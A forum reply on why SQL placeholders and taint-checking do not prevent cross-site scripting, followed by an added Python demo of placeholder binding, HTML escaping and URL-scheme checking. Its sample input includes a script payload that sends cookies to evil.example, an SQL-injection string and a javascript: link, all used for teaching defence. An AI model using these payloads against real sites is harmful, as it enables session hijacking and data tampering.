in reply to Re^2: is this mentality safe?
in thread is this mentality safe?

Taint-checking and placeholders help protect the server against clients trying to perform actions they're not authorized for. They don't help at all against "cross-site scripting" (where one client uses the server to attack other clients).

Cross-site scripting attacks are dangerous because they can trick legitimate users/clients into performing actions they do have authority for, but don't want to do.

So you still need to worry about anything that can influence the client, like HTML/JavaScript in input, etc. Usually, like quoting with DBI, HTML-escaping all output should go some way, but there are more complex issues.

http://www.owasp.org/ is a good resource if you're serious about web security.
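An added example, not part of the post above, showing the point it makes: placeholders keep hostile input out of the SQL, but the same input comes back out of the database unchanged and has to be escaped for the HTML context it lands in. Python's standard-library sqlite3 and html.escape stand in for Perl's DBI placeholders and HTML-escaping; the comments table, the field names and the hostile submission are constructed for illustration. The last rendering function also shows one of the "more complex issues": a URL-valued attribute where plain HTML-escaping leaves a javascript: scheme intact.

```python
import html
import sqlite3
from urllib.parse import urlsplit

# Constructed sample input: one hostile comment-form submission. The author
# field carries an SQL-injection attempt, the body a script tag, and the
# homepage a javascript: URL. Field names are assumptions for this example.
HOSTILE_COMMENT = {
    "author": "Mallory'); DROP TABLE comments; --",
    "body": "<script>document.location='http://evil.example/?c='+document.cookie</script>",
    "homepage": "javascript:alert(document.cookie)",
}


def setup_db():
    """In-memory table standing in for a site's comment store."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, body TEXT, homepage TEXT)"
    )
    return conn


def store_comment(conn, comment):
    """Placeholders (the same idea as DBI's ? binding): values are bound as
    data, so the author string is stored literally and no SQL is executed."""
    conn.execute(
        "INSERT INTO comments (author, body, homepage) VALUES (?, ?, ?)",
        (comment["author"], comment["body"], comment["homepage"]),
    )
    conn.commit()


def fetch_comments(conn):
    return conn.execute(
        "SELECT author, body, homepage FROM comments ORDER BY id"
    ).fetchall()


def render_unsafe(author, body, homepage):
    """No output escaping: the stored <script> runs in every visitor's browser."""
    return f'<p><b>{author}</b>: {body} <a href="{homepage}">homepage</a></p>'


def render_escaped(author, body, homepage):
    """HTML-escape every value on output. This neutralises the script tag,
    but html.escape leaves 'javascript:' untouched, so the link still fires."""
    e = html.escape
    return f'<p><b>{e(author)}</b>: {e(body)} <a href="{e(homepage)}">homepage</a></p>'


def safe_href(url):
    """URL context needs a scheme check on top of HTML escaping. urlsplit
    lowercases the scheme, so JavaScript:/JAVASCRIPT: are caught too."""
    cleaned = url.strip()
    parts = urlsplit(cleaned)
    if parts.scheme in ("http", "https") and parts.netloc:
        return html.escape(cleaned)
    return "#"  # refuse anything that is not a plain web URL


def render_context_aware(author, body, homepage):
    """Escape per context: element text gets html.escape, the href gets safe_href."""
    e = html.escape
    return f'<p><b>{e(author)}</b>: {e(body)} <a href="{safe_href(homepage)}">homepage</a></p>'


def demo():
    """Store the hostile comment with placeholders, then render it three ways."""
    conn = setup_db()
    store_comment(conn, HOSTILE_COMMENT)
    rows = fetch_comments(conn)
    return {
        "rows": rows,
        "unsafe": render_unsafe(*rows[0]),
        "escaped": render_escaped(*rows[0]),
        "context_aware": render_context_aware(*rows[0]),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running it shows the comments table surviving the "DROP TABLE" author string (placeholders did their job), the unescaped rendering containing a live script tag, and the escaped rendering still carrying href="javascript:..." until the URL context gets its own check.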